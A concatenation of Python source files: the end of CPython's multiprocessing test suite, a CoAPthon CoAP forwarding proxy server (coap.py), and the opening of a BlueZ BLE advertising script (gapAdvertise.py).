@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
coap.py
|
import logging
import logging.config
import os
import random
import re
import socket
import threading
import xml.etree.ElementTree as ElementTree
import struct
from coapclient import HelperClient
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.resources.remoteResource import RemoteResource
from coapthon.utils import Tree, create_logging
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.layers.cachelayer import CacheLayer
from coapthon.messages.request import Request
from coapthon.layers.messagelayer import MessageLayer
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
def __init__(self, server_address, xml_file, multicast=False, starting_mid=None):
self.stopped = threading.Event()
self.stopped.clear()
self.to_be_stopped = []
self.purge = threading.Thread(target=self.purge)
self.purge.start()
self._messageLayer = MessageLayer(starting_mid)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._forwardLayer = ForwardLayer(self)
self.resourceLayer = ResourceLayer(self)
# Resource directory
root = Resource('root', self, visible=False, observable=False, allow_children=True)
root.path = '/'
self.root = Tree()
self.root["/"] = root
self._serializer = None
self.server_address = server_address
self.multicast = multicast
self.file_xml = xml_file
self._mapping = {}
addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
if self.multicast: # pragma: no cover
# Create a socket
self._socket = socket.socket(addrinfo[1], socket.SOCK_DGRAM)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind it to the port
self._socket.bind(('', self.server_address[1]))
group_bin = socket.inet_pton(addrinfo[1], addrinfo[4][0])
# Join group
if addrinfo[0] == socket.AF_INET: # IPv4
mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
else:
mreq = group_bin + struct.pack('@I', 0)
self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
else:
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(self.server_address)
self.parse_config()
def parse_config(self):
tree = ElementTree.parse(self.file_xml)
root = tree.getroot()
for server in root.findall('server'):
destination = server.text
name = server.get("name")
self.discover_remote(destination, name)
def discover_remote(self, destination, name):
assert (isinstance(destination, str))
split = destination.split(":", 1)
host = split[0]
port = int(split[1])
server = (host, port)
client = HelperClient(server)
response = client.discover()
client.stop()
self.discover_remote_results(response, name)
def discover_remote_results(self, response, name):
host, port = response.source
if response.code == defines.Codes.CONTENT.number:
resource = Resource('server', self, visible=True, observable=False, allow_children=True)
self.add_resource(name, resource)
self._mapping[name] = (host, port)
self.parse_core_link_format(response.payload, name, (host, port))
else:
logger.error("Server: " + response.source + " isn't valid.")
def parse_core_link_format(self, link_format, base_path, remote_server):
while len(link_format) > 0:
pattern = "<([^>]*)>;"
result = re.match(pattern, link_format)
path = result.group(1)
path = path.split("/")
path = path[1:][0]
link_format = link_format[result.end(1) + 2:]
pattern = "([^<,])*"
result = re.match(pattern, link_format)
attributes = result.group(0)
dict_att = {}
if len(attributes) > 0:
attributes = attributes.split(";")
for att in attributes:
a = att.split("=")
# TODO check correctness
dict_att[a[0]] = a[1]
link_format = link_format[result.end(0) + 1:]
# TODO handle observing
resource = RemoteResource('server', remote_server, path, coap_server=self, visible=True, observable=False,
allow_children=True)
resource.attributes = dict_att
self.add_resource(base_path + "/" + path, resource)
logger.info(self.root.dump())
def purge(self):
while not self.stopped.isSet():
self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
self._messageLayer.purge()
def listen(self, timeout=10):
"""
Listen for incoming messages. Timeout is used to check if the server must be switched off.
:param timeout: Socket Timeout in seconds
"""
self._socket.settimeout(float(timeout))
while not self.stopped.isSet():
try:
data, client_address = self._socket.recvfrom(4096)
except socket.timeout:
continue
try:
self.receive_datagram((data, client_address))
except RuntimeError:
print "Exception with Executor"
self._socket.close()
def close(self):
"""
Stop the server.
"""
logger.info("Stop server")
self.stopped.set()
for event in self.to_be_stopped:
event.set()
self._socket.close()
def receive_datagram(self, args):
"""
Receive datagram from the udp socket.
:rtype : Message
"""
data, client_address = args
serializer = Serializer()
message = serializer.deserialize(data, client_address)
if isinstance(message, int):
logger.error("receive_datagram - BAD REQUEST")
rst = Message()
rst.destination = client_address
rst.type = defines.Types["RST"]
rst.code = message
self.send_datagram(rst)
return
logger.debug("receive_datagram - " + str(message))
if isinstance(message, Request):
transaction = self._messageLayer.receive_request(message)
if transaction.request.duplicated and transaction.completed:
logger.debug("message duplicated,transaction completed")
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
elif transaction.request.duplicated and not transaction.completed:
logger.debug("message duplicated,transaction NOT completed")
self._send_ack(transaction)
return
transaction.separate_timer = self._start_separate_timer(transaction)
transaction = self._blockLayer.receive_request(transaction)
if transaction.block_transfer:
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
transaction = self._observeLayer.receive_request(transaction)
"""
call to the cache layer to check if there's a cached response for the request
if not, call the forward layer
"""
if self._cacheLayer is not None:
transaction = self._cacheLayer.receive_request(transaction)
if transaction.cacheHit is False:
print transaction.request
transaction = self._forwardLayer.receive_request(transaction)
print transaction.response
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._cacheLayer.send_response(transaction)
else:
transaction = self._forwardLayer.receive_request(transaction)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
if transaction.response is not None:
if transaction.response.type == defines.Types["CON"]:
self._start_retrasmission(transaction, transaction.response)
self.send_datagram(transaction.response)
elif isinstance(message, Message):
transaction = self._messageLayer.receive_empty(message)
if transaction is not None:
transaction = self._blockLayer.receive_empty(message, transaction)
self._observeLayer.receive_empty(message, transaction)
else: # pragma: no cover
logger.error("Received response from %s", message.source)
def send_datagram(self, message):
"""
:type message: Message
:param message:
"""
if not self.stopped.isSet():
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def add_resource(self, path, resource):
"""
Helper function to add resources to the resource directory during server initialization.
:type resource: Resource
:param resource:
"""
assert isinstance(resource, Resource)
path = path.strip("/")
paths = path.split("/")
actual_path = ""
i = 0
for p in paths:
i += 1
actual_path += "/" + p
try:
res = self.root[actual_path]
except KeyError:
res = None
if res is None:
if len(paths) != i:
return False
resource.path = actual_path
self.root[actual_path] = resource
return True
def _start_retrasmission(self, transaction, message):
"""
:type transaction: Transaction
:param transaction:
:type message: Message
:param message:
:rtype : Future
"""
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
args=(transaction, message, future_time, 0))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
and not self.stopped.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not self.stopped.isSet():
retransmit_count += 1
future_time *= 2
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
if message.observe is not None:
self._observeLayer.remove_subscriber(message)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
def _start_separate_timer(self, transaction):
"""
:type transaction: Transaction
:param transaction:
:type message: Message
:param message:
:rtype : Future
"""
t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
t.start()
return t
@staticmethod
def _stop_separate_timer(timer):
"""
:type future: Future
:param future:
"""
timer.cancel()
def _send_ack(self, transaction):
# Handle separate
"""
Sends an ACK message for the request.
:param request: [request, sleep_time] or request
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.request.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
self.send_datagram(ack)
|
gapAdvertise.py
|
#!/usr/bin/python
# SPDX-License-Identifier: LGPL-2.1-or-later
from __future__ import print_function
import argparse
import dbus
import dbus.exceptions
import dbus.mainloop.glib
import dbus.service
import time
import threading
try:
from gi.repository import GObject # python3
except ImportError:
import gobject as GObject # python2
mainloop = None
BLUEZ_SERVICE_NAME = 'org.bluez'
LE_ADVERTISING_MANAGER_IFACE = 'org.bluez.LEAdvertisingManager1'
DBUS_OM_IFACE = 'org.freedesktop.DBus.ObjectManager'
DBUS_PROP_IFACE = 'org.freedesktop.DBus.Properties'
LE_ADVERTISEMENT_IFACE = 'org.bluez.LEAdvertisement1'
class InvalidArgsException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.freedesktop.DBus.Error.InvalidArgs'
class NotSupportedException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.NotSupported'
class NotPermittedException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.NotPermitted'
class InvalidValueLengthException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.InvalidValueLength'
class FailedException(dbus.exceptions.DBusException):
_dbus_error_name = 'org.bluez.Error.Failed'
try:
from gi.repository import GObject
except ImportError:
import gobject as GObject
BUS_NAME = 'org.bluez'
AGENT_INTERFACE = 'org.bluez.Agent1'
AGENT_PATH = "/org/bluez/justWorks/agent"
AGENT_CAPABILITY = "NoInputNoOutput"
bus = None
device_obj = None
dev_path = None
def ask(prompt):
try:
return raw_input(prompt)
except:
return input(prompt)
def set_trusted(path):
props = dbus.Interface(bus.get_object("org.bluez", path),
"org.freedesktop.DBus.Properties")
props.Set("org.bluez.Device1", "Trusted", True)
